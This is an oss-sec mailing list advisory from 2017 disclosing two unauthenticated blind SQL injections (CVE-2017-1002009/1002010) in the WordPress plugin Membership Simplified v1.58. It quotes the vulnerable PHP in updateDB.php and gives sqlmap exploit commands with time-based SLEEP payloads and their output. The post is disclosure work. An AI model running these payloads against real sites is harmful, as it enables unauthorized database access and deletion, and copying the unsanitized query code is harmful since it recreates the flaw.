oss-sec mailing list archives
Multiple Unauthenticated blind SQL injections in Wordpress Plugin Membership Simplified v1.58
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 22 Mar 2017 06:59:33 -0400
Title: Multiple Unauthenticated blind SQL injections in Wordpress Plugin Membership Simplified v1.58 Author: Larry W. Cashdollar, @_larry0 Date: 2017-03-17 CVE-ID:[CVE-2017-1002009][CVE-2017-1002010] Download Site: http://membership.officeautopilot.com/get-it-now/ Vendor: http://membership.officeautopilot.com/ Vendor Notified: 2017-03-17 Vendor Contact: http://membership.officeautopilot.com/1-58-has-been-released-and-works-with-version-4-5-of-wordpress/#comment-484 Advisory: http://www.vapidlabs.com/advisory.php?v=188 Description: Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses. Vulnerability: The code in membership-simplified-for-oap-members-only/updateDB.php is vulnerable to blind SQL injection because it doesn't sanitize user input via any of the POST requests being passed into the SQL query. Also it doesn't check that a user is authorized to make updates to the database. 2 require_once("../../../wp-config.php"); 3 global $wpdb; 4 $table_name = $wpdb->prefix . "download_listing"; 5 $media_table_name = $wpdb->prefix . "media_listing"; 6 $action = $_POST['action']; 7 $updateRecordsArray = $_POST['recordsArray']; 8 $mediaupdateRecordsArray = $_POST['mediaRecordsArray']; CVE-2017-1002009: I chose to test the SQL injection against the delete action as it was the most straightforward injection point. 34 if($action == 'delete') { 35 $upload_base_dir = wp_upload_dir(); 36 $upload_dir = $upload_base_dir['basedir']; 37 $path= $upload_dir.'/membership-simplified-for-oap-members-only/'; 38 $fileName = $wpdb->get_row("select fileName from $table_name where recordId= ".$_POST['recordId'].""); 39 @unlink($path.$fileName->fileName); 40 $query= "delete from $table_name where recordId= '".$_POST['recordId']."' "; 41 $wpdb->query($query) or die('Error, insert query failed'); 42 43 } CVE-2017-1002010: 56 if($action == 'delete_media') { 57 $upload_base_dir = wp_upload_dir(); 58 $upload_dir = $upload_base_dir['basedir']; 59 $path = $upload_dir.'/membership-simplified-for-oap-members-only/'; 60 $fileName = $wpdb->get_row("select fileName from $media_table_name where recordId= ".$_POST['recordId'].""); 61 //@unlink($path.$fileName->fileName); 62 $query= "delete from $media_table_name where recordId= '".$_POST['recordID']."' "; 65 $wpdb->query($query) or die($query); Exploit Code: • $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/updateDB.php' --data 'action=delete&recordId=*' --dbms mysql --level 3 --risk 3 • • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 1411 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) • Payload: action=delete&recordId=(SELECT * FROM (SELECT(SLEEP(5)))uxVZ) • --- • [02:10:51] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Ubuntu 16.04 (xenial) • web application technology: Apache 2.4.18 • back-end DBMS: MySQL >= 5.0.12 • [02:10:51] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 02:10:51 • • • $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/updateDB.php' --data 'action=delete_media&recordId=*' --dbms mysql --level 3 --risk 3 • • sqlmap identified the following injection point(s) with a total of 1411 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) • Payload: action=delete_media&recordId=(SELECT * FROM (SELECT(SLEEP(5)))ENgw) • --- • [02:34:49] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Ubuntu 16.04 (xenial) • web application technology: Apache 2.4.18 • back-end DBMS: MySQL >= 5.0.12 • [02:34:49] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 02:34:49
Current thread:
- Multiple Unauthenticated blind SQL injections in Wordpress Plugin Membership Simplified v1.58 Larry W. Cashdollar (Mar 22)